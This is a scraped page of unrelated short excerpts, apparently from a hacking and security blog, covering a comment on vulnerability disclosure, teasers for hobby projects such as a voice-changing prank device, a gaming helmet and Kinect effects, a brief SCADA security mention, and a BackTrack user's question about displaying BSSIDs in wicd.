The author decided to follow a particular route, probably not out of
malice, but because he believes that his responsibilities to inform
the public outweigh the responsibility to assist the vendor. You
wouldn't do the same, but you haven't discovered these bugs.

Unless your view is that you would rather not know about about
security problems at all, than see a disclosure mode you do not...

Have you ever wanted to be someone else, at least over the phone? Do you dream of turning the tables on telemarketers, making them hurry to get off the line instead of you? If so, [Brad] over at LucidScience has the project for you. A bit of a prankster at heart, he walks through the [...]

[Julian] was rummaging through a military surplus store when he spotted a pair of old helicopter pilot helmets that he absolutely had to have. At $25 they were a steal, but pretty useless in their current state. He decided to modify one of the helmets for use while playing video games, but he didn’t stop [...]

[Francois] over at 1024 Architecture has been working on a project we think you’ll be likely to see in a professional music video before too long. Using his Kinect sensor, ha has been tracking skeletal movements, adding special effects to the resulting wire frame with Quartz Composer. While this idea isn’t new, the next part is. [...]

SCADA is not something we’ve mentioned before, we have covered related areas with articles such as – Industrial Control Systems Safe? I Think Not. Plus the whole Stuxnet thing which was able to attack nuclear plants. In a way I find it ironic because so much more emphasis these days is put on the security [...]

Hi, I am a linux newbie and I have been using BT4-Final for some time and i just downloaded R2 and i found out that wicd was updated to version 1.7 and the the BSSID is not displayed in it's main window any more, the problem that i am connecting to a public AP named WLAN and there are at least 8 other slower open networks named WLAN, is there any way to display the BSSID again on the main window instead of having to check properties > information?